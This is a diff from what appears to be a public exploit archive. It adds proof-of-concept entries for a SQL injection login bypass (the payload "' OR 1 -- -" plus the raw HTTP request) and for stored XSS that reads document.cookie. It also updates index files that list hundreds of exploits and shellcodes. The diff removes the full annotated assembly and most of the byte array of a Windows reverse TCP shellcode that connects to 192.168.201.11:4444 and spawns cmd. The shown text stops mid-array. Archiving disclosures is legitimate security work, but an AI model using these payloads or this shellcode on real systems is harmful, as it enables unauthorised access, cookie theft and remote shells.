 # Loan Management System Login page can be bypassed with a simple SQLi to the username parameter.
 Steps To Reproduce:
 1 - Go to the login page http://localhost/issue_tracker/login.php
 2 - Enter the payload to username field as "admin" or  " ' OR 1 -- - " and enter any character in the password field.
 3 - Click on "Login" button and successful login.
 PoC
 POST /issue_tracker/Actions.php?a=login HTTP/1.1
 Host: 192.168.0.111
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
 Accept: application/json, text/javascript, */*; q=0.01
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 X-Requested-With: XMLHttpRequest
 Content-Length: 31
 Origin: http://localhost
 Connection: close
 Referer: http://localhost/issue_tracker/login.php
 Cookie: PHPSESSID=71bod5tipklk329lpsoqkvfcb9
 username='+OR+1+--+-&password=1
--- a/exploits/php/webapps/50412.txt
+++ b/exploits/php/webapps/50412.txt
@ -0,0 +1,53 @@
 # Exploit Title: Student Quarterly Grading System 1.0 - 'grade' Stored Cross-Site Scripting (XSS)
 # Date: 11.10.2021
 # Exploit Author: Hüseyin Serkan Balkanli
 # Vendor Homepage: https://www.sourcecodester.com/php/14953/student-quarterly-grading-system-using-php-and-sqlite-free-source-code.html
 # Software Link: https://www.sourcecodester.com/download-code?nid=14953&title=Student+Quarterly+Grading+System+using+PHP+and+SQLite+Database+Free+Source+Code
 # Version: 1.0
 # Tested on: Windows 10, Kali Linux
 # Student Quarterly Grading System v1.0 has Stored XSS at "Add New Class" Function.
 Steps To Reproduce:
 1 - Click to Class from Menu and click "Add New".
 2 - Enter the payload to "grade" field as "<script>alert(document.cookie);</script>" without double-quotes and choose one of the Subject from list. (It can be anything, doesn't matter.)
 3 - Click on Save and you are done. It's gonna be triggered when anyone visits the application. It's global and can trigger on any page.
 PoC
 POST /grading_system/Actions.php?a=save_class HTTP/1.1
 Host: localhost
 Content-Length: 457
 sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="94"
 Accept: application/json, text/javascript, */*; q=0.01
 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryO6Q8ADzs1UvBltkB
 X-Requested-With: XMLHttpRequest
 sec-ch-ua-mobile: ?0
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
 sec-ch-ua-platform: "Windows"
 Origin: http://localhost
 Sec-Fetch-Site: same-origin
 Sec-Fetch-Mode: cors
 Sec-Fetch-Dest: empty
 Referer: http://localhost/grading_system/?page=class
 Accept-Encoding: gzip, deflate
 Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
 Cookie: PHPSESSID=arkil63kkqsabj3b8cf3oimm2j; __news247__logged=1; __news247__key=4599c04802b500f180c29bc60bdf1923
 Connection: close
 ------WebKitFormBoundaryO6Q8ADzs1UvBltkB
 Content-Disposition: form-data; name="id"
 ------WebKitFormBoundaryO6Q8ADzs1UvBltkB
 Content-Disposition: form-data; name="subject_id"
 3
 ------WebKitFormBoundaryO6Q8ADzs1UvBltkB
 Content-Disposition: form-data; name="grade"
 <script>alert(document.cookie);</script>
 ------WebKitFormBoundaryO6Q8ADzs1UvBltkB
 Content-Disposition: form-data; name="section"
 ------WebKitFormBoundaryO6Q8ADzs1UvBltkB--
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -18488,6 +18488,8 @@ id,file,description,date,author,type,platform,port
 50335,exploits/hardware/remote/50335.py,"Cisco small business RV130W 1.0.3.44 - Inject Counterfeit Routers",1970-01-01,"Michael Alamoot",remote,hardware,
 50347,exploits/linux/remote/50347.py,"Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2)",1970-01-01,shinris3n,remote,linux,
 50351,exploits/hardware/remote/50351.txt,"Mitrastar GPT-2541GNAC-N1 - Privilege escalation",1970-01-01,"Leonardo Nicolas Servalli",remote,hardware,
 50407,exploits/hardware/remote/50407.py,"Cypress Solutions CTM-200/CTM-ONE - Hard-coded Credentials Remote Root (Telnet/SSH)",1970-01-01,LiquidWorm,remote,hardware,
 50408,exploits/hardware/remote/50408.txt,"Cypress Solutions CTM-200 2.7.1 - Root Remote OS Command Injection",1970-01-01,LiquidWorm,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@ -42669,7 +42671,7 @@ id,file,description,date,author,type,platform,port
 47160,exploits/php/webapps/47160.txt,"Ovidentia 8.4.3 - SQL Injection",1970-01-01,UserX,webapps,php,80
 47161,exploits/php/webapps/47161.php,"MyBB < 1.8.21 - Remote Code Execution",1970-01-01,"Giovanni Chhatta",webapps,php,
 47177,exploits/php/webapps/47177.txt,"Moodle Filepicker 3.5.2 - Server Side Request Forgery",1970-01-01,"Fabian Mosch_ Nick Theisinger",webapps,php,80
-47179,exploits/jsp/webapps/47179.py,"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution",1970-01-01,"Wietse Boonstra",webapps,jsp,
+47179,exploits/jsp/webapps/47179.py,"Ahsay Backup 8.1.1.50 - Insecure File Upload and Code Execution (Authenticated)",1970-01-01,"Wietse Boonstra",webapps,jsp,
 47180,exploits/jsp/webapps/47180.rb,"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)",1970-01-01,"Wietse Boonstra",webapps,jsp,443
 47181,exploits/jsp/webapps/47181.txt,"Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection",1970-01-01,"Wietse Boonstra",webapps,jsp,80
 47182,exploits/php/webapps/47182.html,"WordPress Plugin Simple Membership 3.8.4 - Cross-Site Request Forgery",1970-01-01,rubyman,webapps,php,80
@ -43785,6 +43787,7 @@ id,file,description,date,author,type,platform,port
 49432,exploits/multiple/webapps/49432.sh,"EyesOfNetwork 5.3 - File Upload Remote Code Execution",1970-01-01,"Audencia Business SCHOOL Red Team",webapps,multiple,
 49436,exploits/hardware/webapps/49436.py,"Cisco UCS Manager 2.2(1d) - Remote Command Execution",1970-01-01,liquidsky,webapps,hardware,
 49437,exploits/multiple/webapps/49437.txt,"Xwiki CMS 12.10.2 - Cross Site Scripting (XSS)",1970-01-01,"Karan Keswani",webapps,multiple,
 50403,exploits/php/webapps/50403.txt,"Simple Payroll System 1.0 - SQLi Authentication Bypass",1970-01-01,"Yash Mahajan",webapps,php,
 49448,exploits/php/webapps/49448.txt,"Apartment Visitors Management System 1.0 - 'email' SQL Injection",1970-01-01,"CANKAT ÇAKMAK",webapps,php,
 49449,exploits/php/webapps/49449.txt,"Nagios XI 5.7.5 - Multiple Persistent Cross-Site Scripting",1970-01-01,"Matthew Aberegg",webapps,php,
 49450,exploits/php/webapps/49450.rb,"Wordpress Plugin Simple Job Board 2.9.3 - Authenticated File Read (Metasploit)",1970-01-01,"SunCSR Team",webapps,php,
@ -44249,7 +44252,6 @@ id,file,description,date,author,type,platform,port
 50242,exploits/php/webapps/50242.sh,"WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)",1970-01-01,"Numan Rajkotiya",webapps,php,
 50243,exploits/java/webapps/50243.py,"Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Fellipe Oliveira",webapps,java,
 50246,exploits/php/webapps/50246.txt,"WordPress Plugin Payments Plugin | GetPaid 2.4.6 - HTML Injection",1970-01-01,"Niraj Mahajan",webapps,php,
 50248,exploits/php/webapps/50248.txt,"Dolibarr ERP/CRM 14.0.1 - Privilege Escalation",1970-01-01,"Vishwaraj Bhattrai",webapps,php,
 50249,exploits/php/webapps/50249.txt,"OpenSIS Community 8.0 - 'cp_id_miss_attn' SQL Injection",1970-01-01,"Eric Salario",webapps,php,
 50251,exploits/hardware/webapps/50251.txt,"Compro Technology IP Camera - RTSP stream disclosure (Unauthenticated)",1970-01-01,icekam,webapps,hardware,
 50252,exploits/hardware/webapps/50252.txt,"Compro Technology IP Camera - 'Multiple' Credential Disclosure",1970-01-01,icekam,webapps,hardware,
@ -44260,7 +44262,6 @@ id,file,description,date,author,type,platform,port
 50260,exploits/php/webapps/50260.txt,"OpenEMR 6.0.0 - 'noteid' Insecure Direct Object Reference (IDOR)",1970-01-01,"Allen Enosh Upputori",webapps,php,
 50262,exploits/php/webapps/50262.py,"FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Mason Soroka-Gill",webapps,php,
 50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",1970-01-01,sudoninja,webapps,php,
 50264,exploits/php/webapps/50264.py,"Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload & Remote Code Execution (RCE)",1970-01-01,a-rey,webapps,php,
 50267,exploits/multiple/webapps/50267.txt,"Antminer Monitor 0.5.0 - Authentication Bypass",1970-01-01,Vulnz,webapps,multiple,
 50268,exploits/php/webapps/50268.txt,"WordPress Plugin WP Sitemap Page 1.6.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Nikhil Kapoor",webapps,php,
 50269,exploits/php/webapps/50269.py,"WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection (2)",1970-01-01,"Mohin Paramasivam",webapps,php,
@ -44291,7 +44292,6 @@ id,file,description,date,author,type,platform,port
 50304,exploits/php/webapps/50304.sh,"WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated)",1970-01-01,"David Utón",webapps,php,
 50305,exploits/php/webapps/50305.py,"Online Food Ordering System 2.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php,
 50306,exploits/php/webapps/50306.py,"Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php,
 50308,exploits/php/webapps/50308.txt,"Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php,
 50310,exploits/php/webapps/50310.py,"WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php,
 50315,exploits/php/webapps/50315.py,"e107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php,
 50316,exploits/php/webapps/50316.py,"OpenCats 0.9.4-2 - 'docx ' XML External Entity Injection (XXE)",1970-01-01,"Jake Ruston",webapps,php,
@ -44303,7 +44303,6 @@ id,file,description,date,author,type,platform,port
 50323,exploits/php/webapps/50323.html,"Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)",1970-01-01,V1n1v131r4,webapps,php,
 50324,exploits/php/webapps/50324.txt,"WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
 50325,exploits/php/webapps/50325.html,"WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF)",1970-01-01,0xB9,webapps,php,
 50326,exploits/php/webapps/50326.txt,"Budget and Expense Tracker System 1.0 - Arbitrary File Upload",1970-01-01,"()t/\\/\\1",webapps,php,
 50327,exploits/php/webapps/50327.txt,"Police Crime Record Management Project 1.0 - Time Based SQLi",1970-01-01,"()t/\\/\\1",webapps,php,
 50328,exploits/aspx/webapps/50328.txt,"SmarterTools SmarterTrack 7922 - 'Multiple' Information Disclosure",1970-01-01,"Andrei Manole",webapps,aspx,
 50329,exploits/php/webapps/50329.txt,"Pharmacy Point of Sale System 1.0 - SQLi Authentication BYpass",1970-01-01,"Janik Wehrli",webapps,php,
@ -44311,8 +44310,6 @@ id,file,description,date,author,type,platform,port
 50334,exploits/php/webapps/50334.txt,"Library System 1.0 - 'student_id' SQL injection (Authenticated)",1970-01-01,"Vinay Bhuria",webapps,php,
 50339,exploits/hardware/webapps/50339.txt,"FatPipe Networks WARP 10.2.2 - Authorization Bypass",1970-01-01,LiquidWorm,webapps,hardware,
 50340,exploits/hardware/webapps/50340.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
 50341,exploits/hardware/webapps/50341.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)",1970-01-01,LiquidWorm,webapps,hardware,
 50342,exploits/hardware/webapps/50342.py,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation",1970-01-01,LiquidWorm,webapps,hardware,
 50343,exploits/php/webapps/50343.txt,"WordPress Plugin TranslatePress 2.0.8 - Stored Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Nosa Shandy",webapps,php,
 50344,exploits/php/webapps/50344.txt,"WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
 50345,exploits/php/webapps/50345.txt,"WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
@ -44356,3 +44353,12 @@ id,file,description,date,author,type,platform,port
 50399,exploits/php/webapps/50399.txt,"Online Enrollment Management System 1.0 - Authentication Bypass",1970-01-01,"Amine ismail",webapps,php,
 50400,exploits/php/webapps/50400.txt,"Online Employees Work From Home Attendance System 1.0 - SQLi Authentication Bypass",1970-01-01,"Merve Oral",webapps,php,
 50402,exploits/php/webapps/50402.txt,"Loan Management System 1.0 - SQLi Authentication Bypass",1970-01-01,"Merve Oral",webapps,php,
 50404,exploits/php/webapps/50404.txt,"Company's Recruitment Management System 1.0 - 'Multiple' SQL Injection (Unauthenticated)",1970-01-01,"Yash Mahajan",webapps,php,
 50405,exploits/java/webapps/50405.py,"Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)",1970-01-01,"Mayank Deshmukh",webapps,java,
 50406,exploits/multiple/webapps/50406.sh,"Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE)",1970-01-01,"Lucas Souza",webapps,multiple,
 50409,exploits/php/webapps/50409.html,"Pharmacy Point of Sale System 1.0 - 'Add New User' Cross-Site Request Forgery (CSRF)",1970-01-01,"Murat DEMİRCİ",webapps,php,
 50410,exploits/php/webapps/50410.txt,"Online Learning System 2.0 - 'Multiple' SQLi Authentication Bypass",1970-01-01,Blackhan,webapps,php,
 50411,exploits/php/webapps/50411.txt,"Simple Issue Tracker System 1.0 - SQLi Authentication Bypass",1970-01-01,"Bekir Bugra TURKOGLU",webapps,php,
 50412,exploits/php/webapps/50412.txt,"Student Quarterly Grading System 1.0 - 'grade' Stored Cross-Site Scripting (XSS)",1970-01-01,"Hüseyin Serkan Balkanli",webapps,php,
 50413,exploits/multiple/webapps/50413.txt,"Logitech Media Server 8.2.0 - 'Title' Cross-Site Scripting (XSS)",1970-01-01,"Mert Daş",webapps,multiple,
 50414,exploits/hardware/webapps/50414.txt,"Sonicwall SonicOS 7.0 - Host Header Injection",1970-01-01,Ramikan,webapps,hardware,
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@ -1025,4 +1025,3 @@ id,file,description,date,author,type,platform
 48592,shellcodes/linux_x86/48592.c,"Linux/x86 - Disable ASLR Security + Polymorphic Shellcode (124 bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,linux_x86
 48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter (0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",1970-01-01,danf42,shellcode,linux_x86
 48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes)",1970-01-01,"Siddharth Sharma",shellcode,windows_x86
 50291,shellcodes/windows_x86-64/50291.c,"Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,windows_x86-64
--- a/shellcodes/windows_x86-64/50291.c
+++ b/shellcodes/windows_x86-64/50291.c
@ -1,290 +0,0 @@
 # Title: Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)
 # Date: 09.12.2021
 # Author: Xenofon Vassilakopoulos
 # Tested on: Windows/x64 - 10.0.19043 N/A Build 19043
 /*
 MIT License
 Copyright (c) 2021 Xenofon Vassilakopoulos
 Permission is hereby granted, free of charge, to any person obtaining a copy
 of this software and associated documentation files (the "Software"), to deal
 in the Software without restriction, including without limitation the rights
 to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 copies of the Software, and to permit persons to whom the Software is
 furnished to do so, subject to the following conditions:
 The above copyright notice and this permission notice shall be included in all
 copies or substantial portions of the Software.
 THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
 AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
 SOFTWARE.
 [BITS 32]
 global _start
 section .text
 _start:
 ; Locate Kernelbase.dll address
 XOR ECX, ECX							;zero out ECX
 MOV EAX, FS:[ecx + 0x30]				;EAX = PEB
 MOV EAX, [EAX + 0x0c]					;EAX = PEB->Ldr
 MOV ESI, [EAX + 0x14]					;ESI = PEB->Ldr.InMemoryOrderModuleList
 LODSD									;memory address of the second list entry structure
 XCHG EAX, ESI							;EAX = ESI , ESI = EAX
 LODSD									;memory address of the third list entry structure
 XCHG EAX, ESI							;EAX = ESI , ESI = EAX
 LODSD									;memory address of the fourth list entry structure
 MOV EBX, [EAX + 0x10]					;EBX = Base address
 ; Export Table
 MOV EDX, DWORD  [EBX + 0x3C]			;EDX = DOS->e_lfanew
 ADD EDX, EBX							;EDX = PE Header
 MOV EDX, DWORD  [EDX + 0x78]			;EDX = Offset export table
 ADD EDX, EBX							;EDX = Export table
 MOV ESI, DWORD  [EDX + 0x20]			;ESI = Offset names table
 ADD ESI, EBX							;ESI = Names table
 XOR ECX, ECX							;EXC = 0
 GetFunction :
 INC ECX; increment counter
 LODSD									;Get name offset
 ADD EAX, EBX							;Get function name
 CMP dword [EAX], 0x50746547				;"PteG"
 JNZ SHORT GetFunction					;jump to GetFunction label if not "GetP"
 CMP dword [EAX + 0x4], 0x41636F72		;"rocA"
 JNZ SHORT GetFunction					;jump to GetFunction label if not "rocA"
 CMP dword [EAX + 0x8], 0x65726464		;"ddre"
 JNZ SHORT GetFunction					;jump to GetFunction label if not "ddre"
 MOV ESI, DWORD [EDX + 0x24]	    		;ESI = Offset ordinals
 ADD ESI, EBX							;ESI = Ordinals table
 MOV CX,  WORD [ESI + ECX * 2]			;CX = Number of function
 DEC ECX									;Decrement the ordinal
 MOV ESI, DWORD [EDX + 0x1C]	    		;ESI = Offset address table
 ADD ESI, EBX							;ESI = Address table
 MOV EDX, DWORD [ESI + ECX * 4]			;EDX = Pointer(offset)
 ADD EDX, EBX							;EDX = GetProcAddress
 ; Get the Address of LoadLibraryA function
 XOR ECX, ECX						 ;ECX = 0
 PUSH EBX							 ;Kernel32 base address
 PUSH EDX							 ;GetProcAddress
 PUSH ECX							 ;0
 PUSH 0x41797261						 ;"Ayra"
 PUSH 0x7262694C						 ;"rbiL"
 PUSH 0x64616F4C						 ;"daoL"
 PUSH ESP							 ;"LoadLibrary"
 PUSH EBX							 ;Kernel32 base address
 MOV  ESI, EBX						 ;save the kernel32 address in esi for later
 CALL EDX							 ;GetProcAddress(LoadLibraryA)
 ADD ESP, 0xC						 ;pop "LoadLibraryA"
 POP EDX								 ;EDX = 0
 PUSH EAX							 ;EAX = LoadLibraryA
 PUSH EDX							 ;ECX = 0
 MOV DX, 0x6C6C						 ;"ll"
 PUSH EDX
 PUSH 0x642E3233						 ;"d.23"
 PUSH 0x5F327377						 ;"_2sw"
 PUSH ESP							 ;"ws2_32.dll"
 CALL EAX							 ;LoadLibrary("ws2_32.dll")
 ADD  ESP, 0x10						 ;Clean stack
 MOV  EDX, [ESP + 0x4]				 ;EDX = GetProcAddress
 PUSH 0x61617075						 ;"aapu"
 SUB  word [ESP + 0x2], 0x6161		 ;"pu" (remove "aa")
 PUSH 0x74726174						 ;"trat"
 PUSH 0x53415357						 ;"SASW"
 PUSH ESP							 ;"WSAStartup"
 PUSH EAX							 ;ws2_32.dll address
 MOV	 EDI, EAX						 ;save ws2_32.dll to use it later
 CALL EDX							 ;GetProcAddress(WSAStartup)
 ; Call WSAStartUp
 XOR  EBX, EBX						 ;zero out ebx register
 MOV  BX, 0x0190						 ;EAX = sizeof(struct WSAData)
 SUB  ESP, EBX						 ;allocate space for the WSAData structure
 PUSH ESP							 ;push a pointer to WSAData structure
 PUSH EBX							 ;Push EBX as wVersionRequested
 CALL EAX							 ;Call WSAStartUp
 ;Find the address of WSASocketA
 ADD  ESP, 0x10						 ;Align the stack
 XOR  EBX, EBX						 ;zero out the EBX register
 ADD  BL, 0x4						 ;add 0x4 at the lower register BL
 IMUL EBX, 0x64						 ;EBX = 0x190
 MOV  EDX, [ESP + EBX]				 ;EDX has the address of GetProcAddress
 PUSH 0x61614174						 ;"aaAt"
 SUB  word [ESP + 0x2], 0x6161	     ;"At" (remove "aa")
 PUSH  0x656b636f					 ;"ekco"
 PUSH  0x53415357				 	 ;"SASW"
 PUSH ESP							 ;"WSASocketA", GetProcAddress 2nd argument
 MOV  EAX, EDI						 ;EAX now holds the ws2_32.dll address
 PUSH EAX							 ;push the first argument of GetProcAddress
 CALL EDX							 ;call GetProcAddress
 PUSH EDI							 ;save the ws2_32.dll address to use it later
 ;call WSASocketA
 XOR ECX, ECX						 ;zero out ECX register
 PUSH EDX							 ;null value for dwFlags argument
 PUSH EDX							 ;zero value since we dont have an existing socket group
 PUSH EDX							 ;null value for lpProtocolInfo
 MOV  DL, 0x6						 ;IPPROTO_TCP
 PUSH EDX							 ;set the protocol argument
 INC  ECX							 ;SOCK_STREAM(TCP)
 PUSH ECX							 ;set the type argument
 INC  ECX							 ;AF_INET(IPv4)
 PUSH ECX							 ;set the ddress family specification argument
 CALL EAX							 ;call WSASocketA
 XCHG EAX, ECX						 ;save the socket returned from WSASocketA at EAX to ECX in order to use it later
 ;Find the address of connect
 POP  EDI                             ;load previously saved ws2_32.dll address to ECX
 ADD  ESP, 0x10                       ;Align stack
 XOR  EBX, EBX                        ;zero out EBX
 ADD  BL, 0x4                         ;add 0x4 to lower register BL
 IMUL EBX, 0x63                       ;EBX = 0x18c
 MOV  EDX, [ESP + EBX]                ;EDX has the address of GetProcAddress
 PUSH 0x61746365                      ;"atce"
 SUB  word [ESP + 0x3], 0x61		     ;"tce" (remove "a")
 PUSH 0x6e6e6f63                      ;"nnoc"
 PUSH ESP                             ;"connect", second argument of GetProcAddress
 PUSH EDI                             ;ws32_2.dll address, first argument of GetProcAddress
 XCHG ECX, EBP
 CALL EDX                             ;call GetProcAddress
 ;call connect
 PUSH 0x0bc9a8c0                      ;sin_addr set to 192.168.201.11
 PUSH word 0x5c11				 	 ;port = 4444
 XOR  EBX, EBX                        ;zero out EBX
 add  BL, 0x2                         ;TCP protocol
 PUSH word BX						 ;push the protocol value on the stack
 MOV  EDX, ESP                        ;pointer to sockaddr structure (IP,Port,Protocol)
 PUSH byte  16					 	 ;the size of sockaddr - 3rd argument of connect
 PUSH EDX                             ;push the sockaddr - 2nd argument of connect
 PUSH EBP                             ;socket descriptor = 64 - 1st argument of connect
 XCHG EBP, EDI
 CALL EAX                             ;execute connect;
 ;Find the address of CreateProcessA
 ADD  ESP, 0x14                       ;Clean stack
 XOR  EBX, EBX                        ;zero out EBX
 ADD  BL, 0x4                         ;add 0x4 to lower register BL
 IMUL EBX, 0x62                       ;EBX = 0x194
 MOV  EDX, [ESP + EBX]                ;EDX has the address of GetProcAddress
 PUSH 0x61614173                      ;"aaAs"
 SUB  dword [ESP + 0x2], 0x6161		 ;"As"
 PUSH 0x7365636f                      ;"seco"
 PUSH 0x72506574                      ;"rPet"
 PUSH 0x61657243                      ;"aerC"
 PUSH ESP                             ;"CreateProcessA" - 2nd argument of GetProcAddress
 MOV  EBP, ESI                        ;move the kernel32.dll to EBP
 PUSH EBP                             ;kernel32.dll address - 1st argument of GetProcAddress
 CALL EDX                             ;execute GetProcAddress
 PUSH EAX                             ;address of CreateProcessA
 LEA EBP, [EAX]                       ;EBP now points to the address of CreateProcessA
 ;call CreateProcessA
 PUSH 0x61646d63                      ;"admc"
 SUB  word [ESP + 0x3], 0x61			 ;"dmc" ( remove a)
 MOV  ECX, ESP                        ;ecx now points to "cmd" string
 XOR  EDX, EDX                        ;zero out EDX
 SUB  ESP, 16
 MOV  EBX, esp                        ;pointer for ProcessInfo
 ;STARTUPINFOA struct
 PUSH EDI                             ;hStdError  => saved socket
 PUSH EDI                             ;hStdOutput => saved socket
 PUSH EDI                             ;hStdInput  => saved socket
 PUSH EDX                             ;lpReserved2 => NULL
 PUSH EDX                             ;cbReserved2 => NULL
 XOR  EAX, EAX                        ;zero out EAX register
 INC  EAX                             ;EAX => 0x00000001
 ROL  EAX, 8                          ;EAX => 0x00000100
 PUSH EAX                             ;dwFlags => STARTF_USESTDHANDLES 0x00000100
 PUSH EDX                             ;dwFillAttribute => NULL
 PUSH EDX                             ;dwYCountChars => NULL
 PUSH EDX                             ;dwXCountChars => NULL
 PUSH EDX                             ;dwYSize => NULL
 PUSH EDX                             ;dwXSize => NULL
 PUSH EDX                             ;dwY => NULL
 PUSH EDX                             ;dwX => NULL
 PUSH EDX                             ;pTitle => NULL
 PUSH EDX                             ;pDesktop => NULL
 PUSH EDX                             ;pReserved => NULL
 XOR  EAX, EAX                        ;zero out EAX
 ADD  AL, 44                          ;cb => 0x44 (size of struct)
 PUSH EAX                             ;eax points to STARTUPINFOA
 ;ProcessInfo struct
 MOV  EAX, ESP                        ;pStartupInfo
 PUSH EBX                             ;pProcessInfo
 PUSH EAX                             ;pStartupInfo
 PUSH EDX                             ;CurrentDirectory => NULL
 PUSH EDX                             ;pEnvironment => NULL
 PUSH EDX                             ;CreationFlags => 0
 XOR  EAX, EAX                        ;zero out EAX register
 INC  EAX                             ;EAX => 0x00000001
 PUSH EAX                             ;InheritHandles => TRUE => 1
 PUSH EDX                             ;pThreadAttributes => NULL
 PUSH EDX                             ;pProcessAttributes => NULL
 PUSH ECX                             ;pCommandLine => pointer to "cmd"
 PUSH EDX                             ;ApplicationName => NULL
 CALL EBP                             ;execute CreateProcessA
 */
 #include <windows.h>
 #include <iostream>
 #include <stdlib.h>
 char code[] =
 "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x96\xad\x8b"
 "\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31"
 "\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f"
 "\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde"
 "\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31\xc9\x53"
 "\x52\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54"
 "\x53\x89\xde\xff\xd2\x83\xc4\x0c\x5a\x50\x52\x66\xba\x6c\x6c\x52\x68\x33"
 "\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\xd0\x83\xc4\x10\x8b\x54\x24\x04"
 "\x68\x75\x70\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x74\x61\x72\x74\x68"
 "\x57\x53\x41\x53\x54\x50\x89\xc7\xff\xd2\x31\xdb\x66\xbb\x90\x01\x29\xdc"
 "\x54\x53\xff\xd0\x83\xc4\x10\x31\xdb\x80\xc3\x04\x6b\xdb\x64\x8b\x14\x1c"
 "\x68\x74\x41\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x6f\x63\x6b\x65\x68"
 "\x57\x53\x41\x53\x54\x89\xf8\x50\xff\xd2\x57\x31\xc9\x52\x52\x52\xb2\x06"
 "\x52\x41\x51\x41\x51\xff\xd0\x91\x5f\x83\xc4\x10\x31\xdb\x80\xc3\x04\x6b"
 "\xdb\x63\x8b\x14\x1c\x68\x65\x63\x74\x61\x66\x83\x6c\x24\x03\x61\x68\x63"
 "\x6f\x6e\x6e\x54\x57\x87\xcd\xff\xd2\x68\xc0\xa8\xc9\x0b\x66\x68\x11\x5c"
 "\x31\xdb\x80\xc3\x02\x66\x53\x89\xe2\x6a\x10\x52\x55\x87\xef\xff\xd0\x83"
 "\xc4\x14\x31\xdb\x80\xc3\x04\x6b\xdb\x62\x8b\x14\x1c\x68\x73\x41\x61\x61"
 "\x81\x6c\x24\x02\x61\x61\x00\x00\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72"
